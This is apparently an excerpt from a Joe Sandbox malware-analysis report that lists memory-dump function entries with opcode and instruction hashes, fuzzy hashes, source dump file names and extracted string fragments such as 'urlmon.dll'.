                                                            • Instruction ID: 7e3265105e650674bf7f998fe936aaf3e131528cf08554f5815883f97b6cb929
                                                            • Opcode Fuzzy Hash: b7327f516e50e532ebdfffddbb2e9d8dd8c43c2c21fac7d0622ed6c0ce123638
                                                            • Instruction Fuzzy Hash: 41119171601644BFE720EBA8CC41FABB7ACDF88714F104609FE199B284E770B91587A1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b132e55199d11ecd721b4442fc7a0c29695f43b55d018149eb64a9c96daa769
                                                            • Instruction ID: edde476600c15901b6382e750b709fcbdd53f3b1806dc0087400f4afa83f0232
                                                            • Opcode Fuzzy Hash: 2b132e55199d11ecd721b4442fc7a0c29695f43b55d018149eb64a9c96daa769
                                                            • Instruction Fuzzy Hash: 60118F716016447BE720EFA9DC41FABB7ACDF89714F004509FA18AA284E770B904C7E1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62c1930f88c141f716386b01992686818c9fb825c6858f38ab9b9b3c74a79f0c
                                                            • Instruction ID: 6ead8ebf9efc9e42493069427bc1e42af9c3ba398d44172977664fb107edb3d2
                                                            • Opcode Fuzzy Hash: 62c1930f88c141f716386b01992686818c9fb825c6858f38ab9b9b3c74a79f0c
                                                            • Instruction Fuzzy Hash: 6A1100B6D0121CAF9B40DFE9D9419EEBBF9FF88200F14456AE919E7200F7715A048BA0
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5978d441bdf714258c55e79d7431949182b83d02229c66b29665a6c5ffabf93
                                                            • Instruction ID: e41e81b230f035dee49659e8522a6cd2402f9b1367632f0337c69286edeb72b3
                                                            • Opcode Fuzzy Hash: d5978d441bdf714258c55e79d7431949182b83d02229c66b29665a6c5ffabf93
                                                            • Instruction Fuzzy Hash: 4D01C0B2214108BFCB44DE89DC90EEB77AEAF8C714F018208FA09E3245D630F8518BA4
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a71d32dd3e87a60fcc0c94720494f9ca37e5512a64f03208f5812fc0282abba2
                                                            • Instruction ID: 4bc70e569eb8bdf676174a1eb0c250778ab4f0fd01d60f8dc80e5eb5cb99eb9d
                                                            • Opcode Fuzzy Hash: a71d32dd3e87a60fcc0c94720494f9ca37e5512a64f03208f5812fc0282abba2
                                                            • Instruction Fuzzy Hash: 9901E9B2C0121CAFDB41DFE8D941AEEBBF8AB48204F14426EE515F7240F77157048BA5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b27859bc1195cf8f85bb4481ffd90c62e4d95b47a67d8e22c98950165f75ce14
                                                            • Instruction ID: be4a90bd0c93660715c6bf390593492fd74c25c38713b6ec2def3211b2f88a8c
                                                            • Opcode Fuzzy Hash: b27859bc1195cf8f85bb4481ffd90c62e4d95b47a67d8e22c98950165f75ce14
                                                            • Instruction Fuzzy Hash: B3F0C27360021A6FDB119E5AEC81ADAB7DCEB85334F250226F91C9B241D671F41187A0
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d008b6b08cafff4f555ce4daaab53ff53e0bcb604e8ba29a3e68116b713e214f
                                                            • Instruction ID: 35181ca1ab095659ef6e4714e6c6745ab03e1d653aa41619ed0d5105d061893d
                                                            • Opcode Fuzzy Hash: d008b6b08cafff4f555ce4daaab53ff53e0bcb604e8ba29a3e68116b713e214f
                                                            • Instruction Fuzzy Hash: E7F01C76201209BBE714EF99DD81EAB77ADEFC9714F008509FA1897241D670B9118BB1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7858b9fe5353e9f427b5755904e6d5cfee85f16672af3b9da03308cd619848c8
                                                            • Instruction ID: 4ab399a253f21bd1853f1226f8aee4112f040fbb30ca389bc4933ad0139adac3
                                                            • Opcode Fuzzy Hash: 7858b9fe5353e9f427b5755904e6d5cfee85f16672af3b9da03308cd619848c8
                                                            • Instruction Fuzzy Hash: 24F08271805208EBDB14DFA4D941BEEBBB4EB04320F104369E8349B2C0E634A7508781
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                                            • Instruction ID: 660546d1182668c017d6668ca57feecc2f723fd301f7ee898166a2e488a7bb5d
                                                            • Opcode Fuzzy Hash: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                                            • Instruction Fuzzy Hash: 79E0ED722052097BE714EE59DC41EAB77ADEFC9714F008419FA48A7241D670BD1187B5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 391b4d58d52b731e1579c0b354a8d2318bb0a66188b6d99ab14393648d4e5f8d
                                                            • Instruction ID: 4c68cd3b5d47379677d038ffbbf934e45baf64081a100d72e2d80689ffdca822
                                                            • Opcode Fuzzy Hash: 391b4d58d52b731e1579c0b354a8d2318bb0a66188b6d99ab14393648d4e5f8d
                                                            • Instruction Fuzzy Hash: B3E04F7360061427D22066CA9D05F97BB5CCBD1B60F4500A4FF089B344E661BD0042E5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                                            • Instruction ID: deac5317185006c55ae094171f3a49687cc4407de2808b00dab3386a668d986c
                                                            • Opcode Fuzzy Hash: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                                            • Instruction Fuzzy Hash: CAE046322002047BE220FA99DC41FABB7ADDFC6724F01801AFA08A7245D671B91187E2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7beb52a0bf7e41ece3633e8140ba5660cfb976a7d362834f8546819f47a0b02a
                                                            • Instruction ID: dbbb3fad34d3b09307d386d58025512a491f52228b86c0083593202bf6e03b38
                                                            • Opcode Fuzzy Hash: 7beb52a0bf7e41ece3633e8140ba5660cfb976a7d362834f8546819f47a0b02a
                                                            • Instruction Fuzzy Hash:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                            • API String ID: 0-3248090998
                                                            • Opcode ID: 850ba9d105044e8933766fd3ae9b401143933ad95f2a6eefe0e722c1b1a8fcc1
                                                            • Instruction ID: 1da10c9d5c80f35c4144fcab613b78c225dbf3a3f62519ee67408e24449281a5
                                                            • Opcode Fuzzy Hash: 850ba9d105044e8933766fd3ae9b401143933ad95f2a6eefe0e722c1b1a8fcc1
                                                            • Instruction Fuzzy Hash: 6A910FF08052A98ACB118F59A4603DFBF71BB85304F1581E9C6AA7B243C3BE4E45DF90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                            • API String ID: 0-1002149817
                                                            • Opcode ID: 145a11b20b770ebfde5be354ed473de1e3f9698e23da6a08c6c6333b78a5bbe5
                                                            • Instruction ID: 9f497ca900b8f79226b6d82ea8cf19ef253010b500cd29906aed5669162309ab
                                                            • Opcode Fuzzy Hash: 145a11b20b770ebfde5be354ed473de1e3f9698e23da6a08c6c6333b78a5bbe5
                                                            • Instruction Fuzzy Hash: 80C120B1D002689EEF20DFA5CD44BEEBBB9AF45304F0041D9E54CAB241E7B55A88CF65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                            • API String ID: 0-3236418099
                                                            • Opcode ID: b785e229d6b47ca35d77694681929b137ee3361913865c0c8d40768a95b595c8
                                                            • Instruction ID: 2dbc931c5662b53a431b9d42a356b6587590a0e5a9bdc875336c9b86a7e28380
                                                            • Opcode Fuzzy Hash: b785e229d6b47ca35d77694681929b137ee3361913865c0c8d40768a95b595c8
                                                            • Instruction Fuzzy Hash: F19153B1900218AEEB20EF95DD81FFEB7B9EF44704F4441A9E608A6140EB756B84CF61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                            • API String ID: 0-392141074
                                                            • Opcode ID: aa6d7d092884631cecc9e240286c98b1d9d138cd56774f5cd91794c4150e09d7
                                                            • Instruction ID: 775f457ce40588bea938de2c9e95e53d65a4361c3474f83024e94833b43d9bfc
                                                            • Opcode Fuzzy Hash: aa6d7d092884631cecc9e240286c98b1d9d138cd56774f5cd91794c4150e09d7
                                                            • Instruction Fuzzy Hash: 057135B2D00218ABEB25DBA4CD40FEEB77CBF44704F04419DF609AB144EB7567488B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                            • API String ID: 0-2356907671
                                                            • Opcode ID: 20aeb9c99484688c74a61582ba2735dc02be1de5a7b8f15b76041e67ec72c15f
                                                            • Instruction ID: 888e034217abb7bc60269f04388f76cb522298a0b16a04708e7cccf0787a1351
                                                            • Opcode Fuzzy Hash: 20aeb9c99484688c74a61582ba2735dc02be1de5a7b8f15b76041e67ec72c15f
                                                            • Instruction Fuzzy Hash: CD81A5B2C003186AEB50EBA4DD80FEFB7BCEF44708F444499B609A7145EB756788CB61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                            • API String ID: 0-685823316
                                                            • Opcode ID: a0e6aa08c785d77aaa592c70db370083799890a49322bf9de00ee3cb41f8ec3b
                                                            • Instruction ID: 9a8a4cd7b51b9838f49b6118b3135983a682293756a975254b05457475198078
                                                            • Opcode Fuzzy Hash: a0e6aa08c785d77aaa592c70db370083799890a49322bf9de00ee3cb41f8ec3b
                                                            • Instruction Fuzzy Hash: 1E41B6B6D11208AEEB14DFE4CC85FEEBBB9FF08704F004159E619A6140DBB56644CBA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AMO$"$GFKC$KLFM$NNC$PKFG$RCVK$kLDM$oMXK$qnaa$rCVJ
                                                            • API String ID: 0-3087797663
                                                            • Opcode ID: 510e7224dfd2e8a691990092afe14e457010cc9522518a3ed667535bf4dda1bd
                                                            • Instruction ID: 8cea19dd775765daf5b0f02bacbfc0aeeaae37ef474b09d30fb731505b8db62a
                                                            • Opcode Fuzzy Hash: 510e7224dfd2e8a691990092afe14e457010cc9522518a3ed667535bf4dda1bd
                                                            • Instruction Fuzzy Hash: 6F41EAB490436CDADB20CF95DA897CEBBB6BB05308F218198D8697F210D7350A98CF46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: :$:$:$A$I$N$P$m$s$t
                                                            • API String ID: 0-2304485323
                                                            • Opcode ID: fa8cdf90dda3ae57cc20b5fb250462267ebf5eb7123534add6f21a0a178b9f0a
                                                            • Instruction ID: be99e95f1d90b3336f67948283821920d88100424fc5b4a05e72d287747b9577
                                                            • Opcode Fuzzy Hash: fa8cdf90dda3ae57cc20b5fb250462267ebf5eb7123534add6f21a0a178b9f0a
                                                            • Instruction Fuzzy Hash: 17D1E8B2900309AFEB10EFE4CD81FEEB3B9EF48304F444519E215E7144EB79A9458B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /$<$=$E$J$K$T$m
                                                            • API String ID: 0-3233313832
                                                            • Opcode ID: 0d85d00c96b7606e3de3498ec98ba926f5c25056275e87fcd3f064aae2bacb9e
                                                            • Instruction ID: 16e9e8e7192f2d8f501f3ab498e516ba600ea69a306c48bb794976839a30f9dc
                                                            • Opcode Fuzzy Hash: 0d85d00c96b7606e3de3498ec98ba926f5c25056275e87fcd3f064aae2bacb9e
                                                            • Instruction Fuzzy Hash: FC11C720D087CADDDB12C6BC84186AEBF715F23228F0883D9D5B56A2D2D2794606C7A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: F$P$l$m$o$r$s
                                                            • API String ID: 0-3719776015
                                                            • Opcode ID: 1ac294fe179a30bc5c3dfba1e61c06ee2eb2b2838a7f05d9770b912d0003c21b
                                                            • Instruction ID: dc5e9a053d31fae2fc4fd9cd52a270f0cb58402ee32e2dd842570480149dcc6d
                                                            • Opcode Fuzzy Hash: 1ac294fe179a30bc5c3dfba1e61c06ee2eb2b2838a7f05d9770b912d0003c21b
                                                            • Instruction Fuzzy Hash: 985142B2D00218ABEB15EBA4CC80FEEB77CBF48704F444199F619AB144EB756B448B61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L$S$\$a$c$e$l
                                                            • API String ID: 0-3322591375
                                                            • Opcode ID: 0f737118dba2f3e1f50bc2412f92d8f6988e3d595ba2223d1f467ffda0f802c1
                                                            • Instruction ID: 79f12f879995f9f161d28fcc24fc4d67c6e6b8c6dab98ba1cf2b22f2dc9cbc77
                                                            • Opcode Fuzzy Hash: 0f737118dba2f3e1f50bc2412f92d8f6988e3d595ba2223d1f467ffda0f802c1
                                                            • Instruction Fuzzy Hash: 6F41A6B2C10218ABDB10DFE5DC84BEEB7F8EF88714F05419AE91DA7104EB7169858BD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: F$P$T$f$r$x
                                                            • API String ID: 0-2523166886
                                                            • Opcode ID: 39c607cd153bfa356b71c6140cf195d649c16ad697690b86e7fd7ed1be74cf1a
                                                            • Instruction ID: f6f08217c6bf36721d222a557c6a399067873a3605a7e9f3d4d8ab36e0f6c46e
                                                            • Opcode Fuzzy Hash: 39c607cd153bfa356b71c6140cf195d649c16ad697690b86e7fd7ed1be74cf1a
                                                            • Instruction Fuzzy Hash: 89512371900704AAFB30EBA5CD44BBAB7B8FF10704F00455DE999AB180E7B5B548CB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$F$K$K$U
                                                            • API String ID: 0-3954029044
                                                            • Opcode ID: ca290e15ddefef29e2edd745f01cb6cab597f876b927f0cdd86f6cdce2104038
                                                            • Instruction ID: c330843669ecb90acd07cb7d2690c4f62f3230920dcac95b0e7f5e119c625e42
                                                            • Opcode Fuzzy Hash: ca290e15ddefef29e2edd745f01cb6cab597f876b927f0cdd86f6cdce2104038
                                                            • Instruction Fuzzy Hash: 504135B2D00109ABEB10EBD4DD41FEF73B8EF44308F444199FA09A7145EB76AB548BA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $;$e$k$o
                                                            • API String ID: 0-964179411
                                                            • Opcode ID: c20b2c65c90cca851e924ec691fcdf0ea24905cf56eb1e66f29e5ae750566f9d
                                                            • Instruction ID: 1255f79e579955ab949925bd479548bf8886594760149e6311f1e305362800a6
                                                            • Opcode Fuzzy Hash: c20b2c65c90cca851e924ec691fcdf0ea24905cf56eb1e66f29e5ae750566f9d
                                                            • Instruction Fuzzy Hash: C641C872904608CFCB15DFB8D894ACABBB1FF95324B08834CD8999B582E7326402CB80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: 79ae7b819fb0ce6213993c3a59c499b90adaa3800cfa7911cb8f3ccf9321c877
                                                            • Instruction ID: d7924e4646575636231a1d60346fae1deb9274d72c294344e113df91c8b7cb41
                                                            • Opcode Fuzzy Hash: 79ae7b819fb0ce6213993c3a59c499b90adaa3800cfa7911cb8f3ccf9321c877
                                                            • Instruction Fuzzy Hash: 07B1EDB6A00704AFDB24DBA5CC84FEFB7FDAF88704F104558F619A7244D675AA41CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$h$o
                                                            • API String ID: 0-3662636641
                                                            • Opcode ID: 82237abbf455f24f4176bea2abb3f179f43dbc8d3210224433d754a77f42e6c9
                                                            • Instruction ID: 00b3db24e6cf773edd74342ed5d93540a1de970c9bca5e88fbb26b7accf5908e
                                                            • Opcode Fuzzy Hash: 82237abbf455f24f4176bea2abb3f179f43dbc8d3210224433d754a77f42e6c9
                                                            • Instruction Fuzzy Hash: 988163B3A002187EEB64EB94CD84FEE737CEF89304F4441D9B64996044EF7567848BA2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
                                                            • Opcode ID: daf377aaee95ee77ad2feff1d592c7e6cac04c18e71bfde97e21300da4140c4f
                                                            • Instruction ID: 9fd6d6b84a149344f6ab2924721d99266c50fdfeb469da96ecc6860378eb6461
                                                            • Opcode Fuzzy Hash: daf377aaee95ee77ad2feff1d592c7e6cac04c18e71bfde97e21300da4140c4f
                                                            • Instruction Fuzzy Hash: 8471B371A00609AFEB34CF24D880BDBB3A6FF85314F14862AF51B4B282D77674A4C791
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                            • API String ID: 0-2877786613
                                                            • Opcode ID: 3991b555c3994b57c2ad0be10af4b3e970e4b9da0285dd71f0b59a3736a1b046
                                                            • Instruction ID: e6691f5db598de28090537fad136e387cc74863b88a31ad8401844abe2f1f46d
                                                            • Opcode Fuzzy Hash: 3991b555c3994b57c2ad0be10af4b3e970e4b9da0285dd71f0b59a3736a1b046
                                                            • Instruction Fuzzy Hash: CE316D72A812197AEB11FBE1CD42FEF777DEF45704F404088FA04AA184E7756A0587A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                            • API String ID: 0-2877786613
                                                            • Opcode ID: 2b467180b5c04fbc62351b27f7dd86ff3c615002701ec9c581a062611b24bc90
                                                            • Instruction ID: 3227d93e475a86a48f283f4dae8ba76d74faabf6205c15a41165326de336f8a7
                                                            • Opcode Fuzzy Hash: 2b467180b5c04fbc62351b27f7dd86ff3c615002701ec9c581a062611b24bc90
                                                            • Instruction Fuzzy Hash: E4316D72A812197AEB11FBE1CD42FEF777DDF55604F404088FA04AA184E7757A0187A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$h$o
                                                            • API String ID: 0-3662636641
                                                            • Opcode ID: f99a72aba68dc2c7e893f8e07f32b8f30c98e5f8d096dd553af3e211e98e2b17
                                                            • Instruction ID: 994d6bb2d8dd54ba104a31df25bd8eb06d7daca20c79b1a14a71c67263cc3fdb
                                                            • Opcode Fuzzy Hash: f99a72aba68dc2c7e893f8e07f32b8f30c98e5f8d096dd553af3e211e98e2b17
                                                            • Instruction Fuzzy Hash: 853131B2D002187EEF50DBA4CD41FEEB3B8EF45704F4041D9B549A6144EA7567848FA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_47f0000_TmjHHkXnMrncRmISMzN.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $e$k$o
                                                            • API String ID: 0-3624523832
